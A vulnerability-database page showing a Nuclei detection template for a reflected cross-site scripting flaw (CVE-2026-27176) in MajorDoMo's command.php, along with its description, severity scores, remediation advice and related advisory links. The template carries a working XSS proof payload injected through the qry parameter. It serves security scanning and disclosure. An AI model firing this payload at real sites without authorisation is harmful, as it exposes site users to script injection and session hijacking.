Lucene search
K

MajorDoMo - Cross-Site Scripting

🗓️ 08 Jul 2026 05:22:06Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 11 Views

MajorDoMo reflected cross site scripting via unsanitized qry in command.php; victim visits malicious URL.

Related
Refs
Code
ReporterTitlePublishedViews
Family
Circl
CVE-2026-27176
19 Feb 202610:22
circl
CNNVD
MajorDoMo 跨站脚本漏洞
18 Feb 202600:00
cnnvd
CVE
CVE-2026-27176
18 Feb 202621:10
cve
Cvelist
CVE-2026-27176 MajorDoMo Reflected Cross-Site Scripting in command.php
18 Feb 202621:10
cvelist
NVD
CVE-2026-27176
18 Feb 202622:16
nvd
Positive Technologies
PT-2026-20512
18 Feb 202600:00
ptsecurity
RedhatCVE
CVE-2026-27176
20 Feb 202601:22
redhatcve
Vulnrichment
CVE-2026-27176 MajorDoMo Reflected Cross-Site Scripting in command.php
18 Feb 202621:10
vulnrichment
id: CVE-2026-27176

info:
  name: MajorDoMo - Cross-Site Scripting
  author: DhiyaneshDk
  severity: medium
  description: |
    MajorDoMo contains a reflected XSS caused by unsanitized $qry parameter in command.php, letting attackers inject arbitrary JavaScript via crafted URLs, exploit requires victim to visit malicious URL.
  impact: |
    Attackers can execute arbitrary JavaScript in victim's browser, leading to session hijacking or other client-side attacks.
  remediation: |
    Sanitize the $qry parameter using htmlspecialchars() or equivalent before rendering.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2026-27176
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
    cvss-score: 6.1
    cve-id: CVE-2026-27176
    epss-score: 0.00449
    epss-percentile: 0.36048
    cwe-id: CWE-79
  metadata:
    verified: true
    max-request: 1
    shodan-query: html:"majordomo"
  tags: cve,cve2026,xss,majordomo

http:
  - method: GET
    path:
      - "{{BaseURL}}/command.php?qry=%22%3E%3Cimg%20src%3Dx%20onerror%3Dalert(document.domain)%3E"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"><img src=x onerror=alert(document.domain)>'
          - "Command:"
        condition: and

      - type: word
        part: content_type
        words:
          - "text/html"

      - type: status
        status:
          - 200
# digest: 4a0a0047304502207d583ff84756e572e5d83ae6a3ca9b82e8c315367fbe968e3e86ccdcb81e66a3022100f0166d1e68d0914ad615190fd8daaa9d2358adafb30a7afce84bb34449b2cd76:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

04 May 2026 09:16Current
6Medium risk
Vulners AI Score6
CVSS 45.1
CVSS 3.16.1
EPSS0.00449
SSVC
11